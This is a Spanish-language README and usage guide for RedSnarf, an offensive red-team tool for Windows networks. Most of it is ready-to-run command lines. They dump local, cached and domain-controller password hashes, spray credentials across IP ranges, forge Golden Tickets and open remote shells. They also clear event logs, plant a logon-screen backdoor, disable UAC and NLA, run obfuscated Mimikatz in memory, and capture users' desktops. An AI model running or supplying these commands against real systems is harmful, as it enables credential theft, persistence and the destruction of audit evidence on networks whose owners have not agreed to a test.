
RedSnarf es una herramienta de pruebas de penetración / equipo rojo para entornos Windows
______ .____________ _____
\______ \ ____ __| _/ _____/ ____ _____ ________/ ____\
| _// __ \ / __ |\_____ \ / \\__ \\_ __ \ __\
| | \ ___// /_/ |/ \ | \/ __ \| | \/| |
|____|_ /\___ >____ /_______ /___| (____ /__| |__|
\/ \/ \/ \/ \/ \/
[email protected]
@redsnarf
RedSnarf es una herramienta de prueba de penetración / equipo rojo creada por Ed Williams para recuperar hashes y credenciales de estaciones de trabajo, servidores y controladores de dominio Windows utilizando técnicas seguras de OpSec.
Visite nuestro canal de YouTube para ver vídeos https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ
La funcionalidad de RedSnarf incluye:
• Recuperación de hashes SAM locales
• Enumeración de usuarios que se ejecutan con privilegios elevados del sistema y sus correspondientes contraseñas de secretos de LSA;
• Recuperación de credenciales en caché de MS;
• Pass-the-hash;
• Identificación rápida de combinaciones débiles y adivinables de usuario/contraseña (por defecto administrator/Password01);
• Capacidad para recuperar hashes en un rango;
• Hash spraying -
Credsfile acepta una mezcla de pwdump, fgdump y nombre de usuario y contraseña en texto plano separados por un espacio;
• Volcado de lsass para análisis offline con Mimikatz;
• Volcado de hashes del controlador de dominio usando NTDSUtil y recuperación de NTDS.dit para análisis local;
• Volcado de hashes del controlador de dominio usando el método drsuapi;
• Recuperación de las carpetas Scripts y Policies desde un controlador de dominio y análisis en busca de 'password' y 'administrator';
• Capacidad para descifrar hashes cpassword;
• Capacidad para iniciar un shell en una máquina remota;
• Capacidad para borrar los registros de eventos (aplicación, seguridad, configuración o sistema); (solo versión interna)
• Los resultados se guardan por host para su análisis.
• Habilitar/Deshabilitar RDP en una máquina remota.
• Cambiar el puerto RDP de 3389 a 443 en una máquina remota.
• Habilitar/Deshabilitar NLA en una máquina remota.
• Encontrar dónde están conectados los usuarios en máquinas remotas.
• Backdoor en la pantalla de inicio de sesión de Windows
• Habilitar/Deshabilitar UAC en una máquina remota.
• Mimikatz sigiloso añadido.
• Análisis de hashes de dominio
• Capacidad para determinar qué cuentas están habilitadas/deshabilitadas
• Tomar una captura de pantalla del escritorio de un usuario activo conectado remotamente
• Grabar el escritorio de un usuario activo conectado remotamente
• Descifrar CPassword de Windows
• Descifrar contraseña de WinSCP
• Obtener SPN de usuario
• Recuperar contraseñas WiFi de máquinas remotas
Requisitos:
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Recuperación de lsass usando procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - usado con el análisis de información de Mimikatz localmente
Mostrar ayuda
./redsnarf.py -h
./redsnarf.py --help
Recuperar hashes locales de una sola máquina usando credenciales locales débiles y limpiando el registro de eventos de Seguridad
./redsnarf.py -H ip=10.0.0.50 -uC security
Recuperar hashes locales de una sola máquina usando credenciales locales débiles y limpiando el registro de eventos de Aplicación
./redsnarf.py -H ip=10.0.0.50 -uC application
Recuperar hashes locales de una sola máquina usando credenciales de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .
Recuperar hashes locales de una sola máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com
Recuperar hashes en un rango de red usando credenciales de administrador local
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .
Recuperar hashes en un rango de red usando credenciales de administrador de dominio
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d tudominio.com
Recuperar hashes en un rango de red usando credenciales de administrador de dominio
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d tudominio.com
Rociar hashes en un rango de red
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .
Recuperar hashes en un rango de red con inicio de sesión de dominio
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d tudominio.com
Verificar credenciales rápidamente
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y
Verificar rápidamente un archivo que contiene nombres de usuario (-hS) y una contraseña genérica (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /ruta/a/usuarios.txt -hP ContraseñaAProbar -cQ y
Recuperar hashes usando el método drsuapi (más rápido)
Este método soporta una bandera opcional -q y que consultará LDAP y mostrará si las cuentas están activas o deshabilitadas
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d tudominio.com -hI y (-hQ y)
Recuperar hashes usando NTDSUtil
Este método soporta una bandera opcional -q y que consultará LDAP y mostrará si las cuentas están activas o deshabilitadas
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d tudominio.com -hN y (-hQ y)
Generación de Golden Ticket
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d tudominio.com -hT y
Copiar la carpeta de Políticas y Scripts de un Controlador de Dominio y analizarla en busca de password y administrator
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d tudominio.com -uP y
Descifrar Cpassword
./redsnarf.py -uG cpassword
Encontrar Usuario - En Vivo
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d tudominio.com -eL nombre.usuario
Encontrar Usuario - Fuera de Línea (busca en información descargada previamente)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d tudominio.com -eO nombre.usuario
Mostrar lista de tareas de NT AUTHORITY\SYSTEM
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d tudominio.com -eT y
Capturar el escritorio de un usuario activo conectado remotamente
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d tudominio.com -eS y
Iniciar un shell en una máquina usando credenciales de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y
Iniciar un shell en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -uD y
Recuperar una copia de lsass para análisis offline con Mimikatz en una máquina usando credenciales de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y
Ejecutar mimikatz sigiloso, esta opción inicia un servidor web para servir un script de powershell, el cual está ofuscado y codificado del lado de la máquina, los datos no tocan el disco; las credenciales se extraen en un estilo fácil de leer y se muestran en pantalla.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y
Ejecutar comando personalizado
Ejemplo 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -uX 'net user'
Ejemplo 2 - Las comillas dobles deben escaparse con \
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'
Política de Token de Acceso Local
Crea un archivo por lotes lat.bat que se puede copiar y pegar en la máquina remota para ejecutarlo, lo que modificará el registro y habilitará o deshabilitará la configuración de la Política de Token de Acceso Local.
./redsnarf.py -rL y
Wdigest
Habilitar el valor de registro UseLogonCredential de Wdigest en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rW e
Deshabilitar el valor de registro UseLogonCredential de Wdigest en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rW d
Consultar el valor de registro UseLogonCredential de Wdigest en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rW q
UAC
Habilitar el valor de registro de UAC en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rU e
Deshabilitar el valor de registro de UAC en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rU d
Consultar el valor de registro de UAC en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rU q
Backdoor - Backdoor en la pantalla de Windows - Pulse Mayús izquierdo + Alt izquierdo + Impr Pant para activar
Habilitar el valor de registro de backdoor en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rB e
Deshabilitar el valor de registro de backdoor en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rB d
Consultar el valor de registro de backdoor en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rB q
AutoLogon
Habilitar el valor de registro de AutoLogon de Windows en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rA e
Deshabilitar el valor de registro de AutoLogon de Windows en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rA d
Consultar el valor de registro de AutoLogon de Windows en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rA q
Bloquear una sesión de usuario en una máquina remota usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -uL y
Habilitar RDP en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rR e
Deshabilitar RDP en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rR d
Consultar el estado de RDP en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rR q
Cambiar el puerto RDP de 3389 a 443 - Cambiar el puerto RDP a 443 en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rT e
Cambiar el puerto RDP al valor predeterminado 3389 en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rT d
Consultar el valor del puerto RDP en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rT q
Habilitar RDP múltiple con Mimikatz
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -uR y
Habilitar SingleSessionPerUser de RDP en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rM e
Deshabilitar SingleSessionPerUser de RDP en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rM d
Consultar el estado de SingleSessionPerUser de RDP en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rM q
Habilitar NLA en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rN e
Deshabilitar NLA en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rN d
Consultar el estado de NLA en una máquina usando credenciales de administrador de dominio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d tudominio.com -rN q